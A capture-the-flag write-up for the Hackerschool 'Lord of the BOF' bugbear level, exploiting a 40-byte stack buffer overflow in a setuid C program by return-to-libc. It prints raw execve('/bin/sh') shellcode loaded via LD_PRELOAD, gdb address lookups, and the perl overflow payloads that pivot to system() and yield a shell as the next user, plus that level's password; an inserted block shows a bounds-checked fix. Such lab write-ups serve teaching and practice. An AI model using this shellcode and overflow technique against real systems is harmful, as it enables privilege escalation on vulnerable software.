

Hackerschool LOB ( darkknight -> bugbear ) by ORANG

LOB_darkknight



[darkknight@localhost darkknight]$ bash2
[darkknight@localhost darkknight]$ ls
bugbear  bugbear.c
[darkknight@localhost darkknight]$ cat bugbear.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    if(argv[1][47] == '\xbf')
    {
        printf("stack betrayed you!!\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
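As an added example (not part of the write-up or the challenge), here is what a bounds-checked version of the copy in bugbear.c looks like: the challenge's `argv[1][47] == '\xbf'` check only filters one byte of a stack return address and leaves the overflow itself in place, so a return address outside the stack range passes it. The hypothetical `copy_arg` rejects any argument that does not fit in the 40-byte buffer, and `accepts_len` builds constructed all-'A' inputs of a given length to try it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SZ 40   /* same buffer size as bugbear.c */

/* Added example, not from the write-up: a bounds-checked replacement for
 * the strcpy() in bugbear.c. The challenge's only check, argv[1][47] == '\xbf',
 * looks at one byte of a stack return address and does nothing about the
 * overflow, so a return into a 0x40xxxxxx libc address passes it.
 * Returns 0 on success, -1 when src plus its NUL does not fit in dst. */
int copy_arg(char *dst, size_t dst_sz, const char *src)
{
    size_t n = strlen(src);
    if (n + 1 > dst_sz)          /* reserve a byte for the terminator */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Build a constructed argument of `len` 'A' bytes and report
 * copy_arg's verdict for it (hypothetical helper for trying lengths). */
int accepts_len(size_t len)
{
    char src[128], dst[BUF_SZ];
    if (len >= sizeof src)
        return -1;
    memset(src, 'A', len);
    src[len] = '\0';
    return copy_arg(dst, sizeof dst, src);
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SZ];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SZ - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```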



After launching bash2 and reading the source, this one is RTL.

I think it was the skeleton level; as in that problem, I'll try solving it with a shared library.



[darkknight@localhost tmp]$ cat ORANG.c
#include <stdio.h>

void ORANG(void)
{
    char shellcode[]=
        "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89"
        "\xc2\xb0\x0b\xcd\x80";

    (*(void(*)())shellcode)();
}
[darkknight@localhost tmp]$ gcc ORANG.c -fPIC -shared -o ORANG
[darkknight@localhost tmp]$ ls
ORANG  ORANG.c  bugbear  bugbear.c
[darkknight@localhost tmp]$ export LD_PRELOAD="/home/darkknight/tmp/ORANG"




Put a function that runs the shellcode into a shared library and check it..



[darkknight@localhost tmp]$ gdb ./bugbear
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) b * main
Breakpoint 1 at 0x8048430
(gdb) r
Starting program: /home/darkknight/tmp/./bugbear

Breakpoint 1, 0x8048430 in main ()
(gdb) p ORANG
$1 = {<text variable, no debug info>} 0x40015780 <ORANG>



Confirmed that the function is loaded properly.

Attacking right away..


[darkknight@localhost tmp]$ ./bugbear `perl -e 'print "A"x44,"\x80\x57\x01\x40"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW@
bash$ id
uid=512(darkknight) gid=512(darkknight) groups=512(darkknight)
bash$ exit
exit
[darkknight@localhost tmp]$ cd ..
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\x80\x57\x01\x40"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW@
Segmentation fault


The attack succeeded on the copy, but failed on the original.

I couldn't find the exact reason..

So I'll just solve it with a standard RTL.



(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r
Starting program: /home/darkknight/tmp/bugbear

Breakpoint 1, 0x8048436 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

[darkknight@localhost tmp]$ export ORANG="/bin/sh"
[darkknight@localhost tmp]$ cat getenv.c
#include <stdio.h>
#include <stdlib.h>   /* getenv() prototype */

int main(void)
{
    printf("0x%x\n", getenv("ORANG"));
}
[darkknight@localhost tmp]$ export ORANG="/bin/sh"
[darkknight@localhost tmp]$ ./getenv
0xbffffe37


The system function is at 0x40058ae0. The "/bin/sh" string could also be found inside libc, but for convenience I put it in an environment variable.



[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\xe0\x8a\x05\x40","AAAA","\x35\xfe\xff\xbf","\x00\x00\x00\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@AAAA5
sh: /sh: No such file or directory
Segmentation fault
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\xe0\x8a\x05\x40","AAAA","\x30\xfe\xff\xbf","\x00\x00\x00\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@AAAA0
sh: =/bin/sh: Permission denied
Segmentation fault
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "A"x44,"\xe0\x8a\x05\x40","AAAA","\x31\xfe\xff\xbf","\x00\x00\x00\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@AAAA1
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
bash$ my-pass
euid = 513
new divide


The address wasn't exact, so I adjusted it bit by bit until it worked!!

There are many good write-ups on the RTL technique, so I'll skip explaining RTL itself.